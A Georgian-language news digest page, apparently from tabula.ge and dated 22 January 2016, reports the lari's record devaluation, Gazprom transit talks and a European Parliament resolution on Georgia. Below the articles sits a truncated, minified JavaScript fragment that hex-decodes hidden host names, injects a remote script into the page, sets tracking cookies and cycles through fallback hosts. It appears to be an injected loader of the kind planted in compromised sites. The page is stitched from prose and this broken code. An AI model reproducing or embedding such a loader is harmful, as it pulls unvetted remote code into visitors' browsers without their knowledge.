ფოკუსი

22 იანვარი,2016

22 იანვარს ლარი, არსებობის ისტორიაში, რეკორდულად გაუფასურდა - ეროვნული ბანკის მონაცემებით, ერთი დოლარი 2 ლარი და 47 თეთრი ღირს. ლარი კიდევ უფრო მეტად გაუფასურდებოდა, ეროვნულ ბანკს საკუთარი რეზერვებიდან 20 მილიონი დოლარი რომ არ გაეყიდა. ამ ინტერვენციის შედეგად ეროვნული ვალუტა დაახლოებით ერთი თეთრით გამყარდა. ლარი გაუფასურდა ევროს მიმართაც - ახალი ოფიციალური კურსით, ერთი ევრო 2 ლარი და 67 თეთრი ღირს. საფინანსო საბიუჯეტო კომიტეტის თავმჯდომარე თამაზ მეჭიაური ლარის გაუფასურების მორიგ ტალღას რეგიონში არსებულ ეკონომიკურ კრიზისს უკავშირებს.
-გაზპრომთან მიმდინარე მოლაპარაკებებზე ინფორმაცია საქართველოს ენერგეტიკის მინისტრმა ევროკავშირის ელჩს მიაწოდა. იანოშ ჰერმანისა და კახი კალაძის შეხვედრა დახურულ კარს მიღმა წარიმართა. შეხვედრის შემდეგ კალაძემ თქვა, რომ გაზპრომთან ვენაში გამართულ შეხვედრას კონკრეტული შედეგი არ მოუტანია და რუსული ენერგოგიგანტი საქართველოსგან ტრანზიტის პირობების შეცვლას ისევე მოითხოვს, რაც ქვეყნისთვის წამგებიანია.

- ევროპარლამენტმა საქართველოს, მოლდოვასა და უკრაინის შესახებ რეზოლუციის პროექტი თითქმის უცვლელად დაამტკიცა. რეზოლუციაში საქართველოში მედიის თავისუფლებაზე, მართლმსაჯულების სისტემაზე, წინასწარი პატიმრობის ფართო გამოყენებაზე, პროკურატურის რეფორმირებასა და პოლიტიკური ოპოზიციის მნიშვნელობაზეა საუბარი. რეზოლუციაში აღნიშნულია, რომ წინასწარი პატიმრობა მხოლოდ განსაკუთრებულ შემთხვევებში, სასწრაფო და მკაფიო გარემოებებში უნდა გამოიყენებოდეს. ევროპარლამენტარები მოუწოდებენ საქართველოს მთავრობას, სასამართლო და პროკურატურა არ გამოიყენონ პოლიტიკური დევნისთვის.

o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "tabula.ge"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]]]> //-->

კომენტარები